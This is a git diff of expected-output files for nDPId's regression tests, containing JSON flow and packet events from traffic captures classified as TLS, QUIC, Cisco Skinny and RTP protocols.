-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1646495710534,"flow_last_seen":1646495710610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6845,"flow_avg_l4_payload_len":684,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1646495785326,"flow_last_seen":1646495785351,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2714,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495749875,"flow_last_seen":1646495750848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4556,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646495710343,"flow_last_seen":1646495710456,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6565,"flow_avg_l4_payload_len":729,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1646495837086,"flow_last_seen":1646495837102,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2714,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GooglePlus","breed":"Fun","category":"SocialNetwork"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495650748,"flow_last_seen":1646495650832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4927,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646568788171,"flow_last_seen":1646568788341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646568788341,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646568788171,"flow_last_seen":1646568788508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788508,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01231{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":518,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646568788171,"flow_last_seen":1646568788673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3789,"flow_avg_l4_payload_len":631,"midstream":0,"thread_ts_msec":1646568788673,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","server_names":"*.pandora.com,pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust TLS RSA CA G1","subjectDN":"C=US, ST=California, L=Oakland, O=Pandora Media, LLC, CN=*.pandora.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"40:BB:03:6C:E8:D4:7C:D7:72:59:2F:8D:DB:4B:64:4F:8F:C4:EB:AF"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646568788171,"flow_last_seen":1646568788847,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4237,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1646495710534,"flow_last_seen":1646495710610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6845,"flow_avg_l4_payload_len":684,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1646495785326,"flow_last_seen":1646495785351,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2714,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495749875,"flow_last_seen":1646495750848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4556,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646495710343,"flow_last_seen":1646495710456,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6565,"flow_avg_l4_payload_len":729,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1646495837086,"flow_last_seen":1646495837102,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2714,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GooglePlus","breed":"Fun","category":"SocialNetwork"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495650748,"flow_last_seen":1646495650832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4927,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":520,"packets-processed":520,"total-skipped-flows":0,"total-l4-payload-len":238171,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":43,"total-detection-updates":49,"total-updates":0,"current-active-flows":0,"total-active-flows":47,"total-idle-flows":47,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":338,"global_ts_msec":1646568788847} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 520/520 @@ -344,9 +344,9 @@ ~~ total active/idle flows...: 47/47 ~~ total timeout flows.......: 4 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6247844 bytes -~~ total memory freed........: 6247844 bytes -~~ total allocations/frees...: 119283/119283 +~~ total memory allocated....: 6381478 bytes +~~ total memory freed........: 6381478 bytes +~~ total allocations/frees...: 122045/122045 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2306 chars diff --git a/test/results/skinny.pcap.out b/test/results/skinny.pcap.out new file mode 100644 index 000000000..63bed70cf --- /dev/null +++ b/test/results/skinny.pcap.out @@ -0,0 +1,70 @@ +00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"skinny.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"skinny.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1317801130501} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"skinny.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801130501,"flow_last_seen":1317801130501,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1317801130501,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.12","src_port":49399,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"skinny.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1317801130501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1317801130501,"pkt":"ABTy5fxCAB56JnR1CABFYABAE3YAAEAGYUrAqMM6wKjBDMD3B9A1u8s7p8yxgFAYIAAcEAAAEAAAABQAAAAmAAAAAQAAAAAAAAAAAAAA"} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"skinny.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801130501,"flow_last_seen":1317801130501,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1317801130501,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.12","src_port":49399,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"skinny.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1317801130503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1317801130503,"pkt":"AB56JnR1ABTy5fxCCABFYABENqhAAD8G\/xPAqMEMwKjDOgfQwPenzLGANbvLU1AYLGqriQAAFAAAABQAAACFAAAAAQAAAAEAAAAAAAAAAAAAAA=="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"skinny.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1317801130503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1317801130503,"pkt":"AB56JnR1ABTy5fxCCABFYAA4NqpAAD8G\/x3AqMEMwKjDOgfQwPenzLGcNbvLU1AYLGq1eQAACAAAABQAAACIAAAAAQAAAA=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"skinny.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801130506,"flow_last_seen":1317801130506,"flow_idle_time":7580000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1317801130506,"l3_proto":"ip4","src_ip":"192.168.193.12","dst_ip":"192.168.195.50","src_port":2000,"dst_port":51532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"skinny.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1317801130506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1317801130506,"pkt":"AB1FDGVjABTy5fxCCABFYABM5ZFAAD8GUCrAqMEMwKjDMgfQyUyJcg4lId4l61AYLGoJ+AAAHAAAABQAAAARAQAABAAAAAEAAABLNi4BAAAAAAQAAAAAAAAA"} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"skinny.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801130506,"flow_last_seen":1317801130506,"flow_idle_time":7580000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1317801130506,"l3_proto":"ip4","src_ip":"192.168.193.12","dst_ip":"192.168.195.50","src_port":2000,"dst_port":51532,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"skinny.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1317801130506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1317801130506,"pkt":"AB1FDGVjABTy5fxCCABFYABE5ZNAAD8GUDDAqMEMwKjDMgfQyUyJcg5JId4l61AYLGoX3AAAFAAAABQAAAAQAQAAAQAAAEs2LgEDAAAA\/\/\/\/\/w=="} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"skinny.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1317801130506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1317801130506,"pkt":"AB1FDGVjABTy5fxCCABFYABI5ZVAAD8GUCrAqMEMwKjDMgfQyUyJcg5lId4l61AYLGr9cQAAGAAAABQAAABFAQAAAAAAAAEAAABLNi4BgBczMjEAAAA="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"skinny.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134322,"flow_last_seen":1317801134322,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134322,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.24","src_port":32150,"dst_port":9395,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"skinny.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1317801134322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134322,"pkt":"ABTy5fxCAB56JnR1CABFuADIE4MAAEARYEbAqMM6wKjBGH2WJLMAtK8pgIAFmwAC4MD2v1fi\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/39+\/v18ffz+\/f9+\/n17eXh6e357fv1+\/v59\/fx9fX16e379+vv7+359fnv\/\/X3+\/35\/e3v+\/H7\/fnv+fXz9\/v7+fX18fHx7fHt+f3\/\/fv3+f\/7+\/v79\/\/5\/eXt8fX9+f\/\/\/\/39+f3x5e3x6eX1+fv5+f\/78\/P78\/nz+fn5+fA=="} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"skinny.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134322,"flow_last_seen":1317801134322,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134322,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.24","src_port":32150,"dst_port":9395,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"skinny.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134322,"flow_last_seen":1317801134322,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134322,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.195.50","src_port":32144,"dst_port":17718,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"skinny.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1317801134322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134322,"pkt":"AB1FDGVjAB56JnR1CABFuADIE4QAAEARXivAqMM6wKjDMn2QRTYAtIyXgIAFnAAC4MD2v1fc\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/39+\/v18ffz+\/f9+\/n17eXh6e357fv1+\/v59\/fx9fX16e379+vv7+359fnv\/\/X3+\/35\/e3v+\/H7\/fnv+fXz9\/v7+fX18fHx7fHt+f3\/\/fv3+f\/7+\/v79\/\/5\/eXt8fX9+f\/\/\/\/39+f3x5e3x6eX1+fv5+f\/78\/P78\/nz+fn5+fA=="} 